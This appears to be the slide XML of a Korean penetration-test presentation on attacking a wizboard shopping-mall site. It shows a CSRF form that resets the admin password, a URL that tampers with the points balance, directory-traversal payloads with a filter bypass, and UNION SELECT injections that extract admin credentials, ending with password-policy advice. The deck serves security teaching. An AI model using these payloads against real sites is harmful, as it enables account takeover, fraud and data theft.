            <a:ext cx="673521" cy="799741"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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53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287982" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>CSRF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06414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2-4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8829" y="922435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CSRF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게시물 작성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3996" y="1916832"/>
            <a:ext cx="542982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&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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onload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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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document.csrf.submit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();"&gt;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&lt;form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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csrf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" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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action=“host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주소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”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en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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malladmin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en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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main.php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" method="POST"&gt;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&lt;input type="hidden" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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name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="ID" value="admin"&gt; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0" err="1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관리자이름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&lt;input type="hidden" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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name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="PASS" value="test1324"&gt; // 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바꿀 패스워드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&lt;input type="hidden" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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name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="PASS1" value="test1324"&gt;  //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바꿀 패스워드 확인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&lt;input type="hidden" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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name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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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menushow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" value="menu1"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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……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074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287982" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>CSRF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06414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08829" y="922435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페이지 접속 성공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24" b="56861"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="1844824"/>
            <a:ext cx="599546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5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33683" y="4179499"/>
            <a:ext cx="65664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Advanced Persistent Threats(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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지능적 지속 위협</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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5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5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5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지능적인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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방법을 사용해서 지속적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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대상을 공격하는 것을 말한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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15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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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공격은 과거의 불특정 다수를 노렸던 공격과는 달리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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하나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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대상을 목표로 정한 후에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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내부로 침입을 성공할 때까지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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기술과 공격방식을 기반으로 여러 보안 위협을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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생산하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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공격을 멈추지 않는 것이 특징이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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굉장히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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위험한 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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6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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="직사각형 19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32" y="1132228"/>
            <a:ext cx="6311101" cy="270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42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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0" err="1" smtClean="0"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t> 취약점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4017489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792038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spc="-50" dirty="0" err="1" smtClean="0"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t> 취약점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06414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2-5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8829" y="922435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417479"/>
            <a:ext cx="1714739" cy="13813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06967" y="3100991"/>
            <a:ext cx="2557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게시물 클릭 후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주소창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확인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378" y="3572261"/>
            <a:ext cx="6230315" cy="1463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33683" y="5279547"/>
            <a:ext cx="50674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http://118.41.28.135:112/wizboard.php?getdata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=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QklEPWJvYXJkMDEmR0lEPXJvb3QmYWRtaW5tb2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RlPSZvcHRpb25tb2RlPSZjYXRlZ29yeT0mbW9kZT12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aWV3JlVJRD0xMDImc2VhcmNoX3Rlcm09JlNFQVJ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DSFRJVExFPSZzZWFyY2hrZXl3b3JkPQ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==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961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792038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spc="-50" dirty="0" err="1"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0"/>
              <a:t> 취약점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06414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08829" y="922435"/>
            <a:ext cx="3012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게시물 수정 누를 시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주소창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확인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829" y="1484784"/>
            <a:ext cx="6051603" cy="2300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3683" y="4313190"/>
            <a:ext cx="6343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http://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118.41.28.135:112/wizboard.php?BID=board01&amp;GID=</a:t>
            </a:r>
          </a:p>
          <a:p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root&amp;mode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=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modify&amp;adminmode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=&amp;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optionmode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=&amp;UID=54&amp;cp=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&amp;category=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301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792038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spc="-50" dirty="0" err="1"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0"/>
              <a:t> 취약점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06414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08829" y="922435"/>
            <a:ext cx="3897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게시물 번호 수정 시 타 게시물도 수정 가능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" r="17713"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379135" y="1844824"/>
            <a:ext cx="6224611" cy="333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792038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spc="-50" dirty="0" err="1"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0"/>
              <a:t> 취약점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2352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08829" y="922435"/>
            <a:ext cx="1672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 계정 로그인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428" y="1642229"/>
            <a:ext cx="1724266" cy="12955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984" b="2984"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352258" y="3645024"/>
            <a:ext cx="6480720" cy="1103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7849" y="5458788"/>
            <a:ext cx="6147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http://118.41.28.135:112/lib/ajax.admin.php?smode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=</a:t>
            </a:r>
          </a:p>
          <a:p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in_point&amp;userid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=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계정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ID&amp;point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=100000&amp;content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=&amp;type=point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832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792038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spc="-50" dirty="0" err="1"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0"/>
              <a:t> 취약점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06414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08829" y="922435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 성공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829" y="1668323"/>
            <a:ext cx="1667108" cy="122889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3323" r="64810" b="21237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2408829" y="3789040"/>
            <a:ext cx="3822493" cy="14951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74623" y="3208011"/>
            <a:ext cx="2569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포인트 검증 위해 결제 시도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152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792038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spc="-50" dirty="0" err="1"/>
              <a:t>세션관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0"/>
              <a:t> 취약점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06414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08829" y="922435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결제 성공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79" b="2546"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="1844824"/>
            <a:ext cx="5885452" cy="352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68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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0"/>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>업로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>다운로드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1887291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792038" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>Download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취약점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06414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2-6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8829" y="922435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0184" y="1556792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주 원인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절대 경로 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- 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개발자 실수</a:t>
            </a:r>
          </a:p>
          <a:p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상대 경로 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- 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어플리케이션 취약점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5931" y="2996952"/>
            <a:ext cx="6240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문제 발생시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,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Directory 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Traversal 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등에 의해 다른 위치에 있는 파일도 다운로드 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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Source 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code 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파일이나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, backup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파일 등 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다운로드 가능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08829" y="4653136"/>
            <a:ext cx="36904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윈도우의 경우 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: ../../../../../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boot.ini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../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를 지우는 보안을 해 두면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..././..././ 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다음과 같이 검색을 하면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../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가 지워지고 결국 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../../../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가 남게 된다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328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792038" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>Download</a:t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취약점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06414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1760" y="885628"/>
            <a:ext cx="229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임의 파일 하나를 업로드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712412"/>
            <a:ext cx="2076740" cy="3048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90" y="3289509"/>
            <a:ext cx="4887007" cy="4953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91590" y="2780928"/>
            <a:ext cx="229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다운로드 주소 확인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3445" y="4473181"/>
            <a:ext cx="6179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http://118.41.28.135:112/wizboard/download.php?filename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=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YWFhLmV4ZS5QaFA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=&amp;UID=101&amp;BID=board01&amp;GID=root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91590" y="5528648"/>
            <a:ext cx="1337226" cy="3385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aaa.exe.PhP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919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6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서론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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 dirty="0"/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693896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792038" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>Download</a:t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취약점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06414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2-6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993" y="4293096"/>
            <a:ext cx="2896004" cy="12384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072" y="1628800"/>
            <a:ext cx="3672408" cy="24192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13786" y="1067239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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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의 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Spider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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를 이용한 경로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확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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13786" y="5776551"/>
            <a:ext cx="58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config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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en-US" altLang="ko-KR" b="1" dirty="0" err="1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wizboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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/table/root/board01/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1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updir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ko-KR" altLang="en-US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게시글번호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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156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792038" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>Download</a:t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취약점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06414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08829" y="922435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boot.Ini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다운 시도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02711"/>
            <a:ext cx="5591398" cy="1679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08829" y="3024046"/>
            <a:ext cx="618150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http://118.41.28.135:112/wizboard/download.php?filename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=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.../..//..../..//..../..//..../..//..../..//..../..//..../..//..../..//..../..//..../..//</a:t>
            </a:r>
          </a:p>
          <a:p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boot.ini&amp;UID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=45&amp;BID=board01&amp;GID=root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8829" y="2371176"/>
            <a:ext cx="2044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상대경로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이용해 작성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319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792038" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>Download</a:t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취약점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06414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08829" y="922435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boot.Ini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다운 시도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49" y="1607266"/>
            <a:ext cx="6353818" cy="4902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49" y="3356992"/>
            <a:ext cx="6335009" cy="12193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15968" y="2639762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확인 시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77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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" b="0" spc="-90" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0" err="1"/>
              <a:t>인젝션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622795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792038" cy="603494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1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0" err="1" smtClean="0"/>
              <a:t>인젝션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06414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2-7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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381858"/>
            <a:ext cx="1993593" cy="11257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53854"/>
            <a:ext cx="1375970" cy="9537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79" y="1663305"/>
            <a:ext cx="2736304" cy="8443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166" y="4149080"/>
            <a:ext cx="4029637" cy="11907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15816" y="5746204"/>
            <a:ext cx="514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관리자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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메인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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배송정보 페이지 방어가 된 것을 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="아래쪽 화살표 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5017824" y="3041377"/>
            <a:ext cx="642915" cy="747911"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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 rot="20121245">
            <a:off x="3428794" y="3031837"/>
            <a:ext cx="642915" cy="747911"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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아래쪽 화살표 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1782152">
            <a:off x="6639158" y="3087933"/>
            <a:ext cx="642915" cy="747911"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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201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792038" cy="603494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1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0" err="1" smtClean="0"/>
              <a:t>인젝션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06414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2-7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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101152"/>
            <a:ext cx="2962275" cy="2952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345" y="1812062"/>
            <a:ext cx="2962275" cy="2952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345" y="2189835"/>
            <a:ext cx="2962275" cy="2952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345" y="1434290"/>
            <a:ext cx="2962275" cy="295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95300" y="1491300"/>
            <a:ext cx="3435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Error Based SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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오류메시지를 통해 테이블 구조를</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1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ko-KR" altLang="en-US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알아내기 위한 과정</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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8939" y="5283498"/>
            <a:ext cx="619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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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앞에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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가 붙는 것을 확인 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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필터 적용 중임을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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4810053" y="3099859"/>
            <a:ext cx="642915" cy="747911"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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43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7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792038" cy="603494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1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" spc="-50" dirty="0" err="1" smtClean="0"/>
              <a:t>인젝션</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306414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2-7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2417926" y="1116170"/>
            <a:ext cx="6305387" cy="2160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18" y="3201332"/>
            <a:ext cx="1438476" cy="342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2" t="11781" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2423121" y="4804676"/>
            <a:ext cx="6300192" cy="12828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342872" y="1600420"/>
            <a:ext cx="6048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lib/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ajax.board.php?smode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=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getreple&amp;gid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=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root&amp;bid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=board02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union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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AdminName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, Pass from Wiztable_main%23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7824" y="587727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35247" y="5204969"/>
            <a:ext cx="63530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wizboard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/skin/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sandle_photo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print.php?GID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=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root&amp;BID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=board02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union select 1, 2, 3, 4, 5, 6, 7, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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adminname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, 9, 0, pass, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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12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, 13, 14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15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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from 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wiztable_main%23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5190299" y="2295538"/>
            <a:ext cx="642915" cy="747911"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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 rot="10800000">
            <a:off x="5190299" y="3685630"/>
            <a:ext cx="642915" cy="747911"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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5570" y="2716618"/>
            <a:ext cx="2045753" cy="1156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취약점 경로 두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곳에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0" err="1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쿼리문을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삽입해</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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관리자의 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계정을 탈취</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3362773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4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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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 dirty="0" smtClean="0"/>
              <a:t>결론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1191684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31690" y="938818"/>
            <a:ext cx="1287982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b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>결론</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="그룹 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2333683" y="1124744"/>
            <a:ext cx="5763249" cy="4130131"/>
            <a:chOff x="2333683" y="938818"/>
            <a:chExt cx="5763249" cy="4130131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="직사각형 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2336292" y="1283297"/>
              <a:ext cx="5760640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spc="-3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초기 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" spc="-30" dirty="0" err="1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설정값에서</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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다른 것으로 바꾸는 것으로 권장</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endPara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spc="-3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비밀번호 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" spc="-30" dirty="0" err="1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설정시</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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spc="-3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주의사항</a:t>
              </a:r>
              <a:endPara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endPara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- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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최소 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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10</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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자리 이상 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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영어 대문자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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소문자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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숫자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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특수문자 중 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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r>
                <a:rPr lang="ko-KR" altLang="en-US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종류 조합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- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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최소 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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자리 이상 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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영어 대문자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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소문자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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숫자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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특수문자 중 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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r>
                <a:rPr lang="ko-KR" altLang="en-US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종류 조합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추측하기 어려운 비밀번호</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endPara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- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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일련번호</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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전화번호 등 쉬운 문자열이 포한 되지 않도록 함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- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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잘 알려진 단어</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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키보드 상에서 나란히 있는 문자열이 포함 되지 않도록 함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주기적 변경</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endPara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- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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비밀번호에 유효기간 설정하고 최소 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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r>
                <a:rPr lang="ko-KR" altLang="en-US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개월마다 변경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동일 비밀번호 사용 제한</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endPara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- 2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000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개의 비밀번호를 교대로 사용하지 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" spc="-3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않음</a:t>
              </a:r>
              <a:endPara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33683" y="938818"/>
              <a:ext cx="12987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spc="-3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쇼핑몰 관리자 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1" spc="-3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계정</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" b="1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591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31690" y="938818"/>
            <a:ext cx="1287982" cy="603494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1800" dirty="0"/>
              <a:t>Check List</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-5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49628"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2411760" y="1412776"/>
          <a:ext cx="5128412" cy="46606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9466">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2187547275"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1363922">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3414310476"/>
                    </a:ext>
                  </a:extLst>
